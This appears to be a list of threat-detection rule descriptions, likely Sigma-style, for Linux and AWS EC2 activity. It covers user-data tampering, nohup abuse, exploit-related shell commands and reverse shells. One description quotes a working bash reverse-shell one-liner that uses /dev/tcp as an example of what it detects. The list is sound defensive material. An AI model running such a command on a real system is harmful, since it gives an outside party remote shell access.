Detects changes to the EC2 instance startup (user data) script. That shell script is executed with root (Linux) or SYSTEM (Windows) privileges when the instance boots, so modifying it gives an attacker persistent, privileged code execution.
Detects usage of nohup, which an attacker could leverage to keep a process running after the session ends or to break out of restricted environments
Detects suspicious interactive bash as a parent to rather uncommon child processes
Detects a bash process connecting to a remote IP address (often seen when actors run something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')
Detects suspicious shell commands used in various exploit codes (see references)
Detects suspicious shell commands indicating the information-gathering phase that precedes privilege escalation.
Detects suspicious shell commands used in various Equation Group scripts and tools
Detects a suspicious command sequence used by JexBoss
Detects relevant commands often related to malware or hacking activity
Detects suspicious shell commands or program code that may be executed or used in command line to establish a reverse shell
Detects the usage of the unsafe bpftrace option (--unsafe), which enables unsafe builtins such as system() that run arbitrary commands from within a trace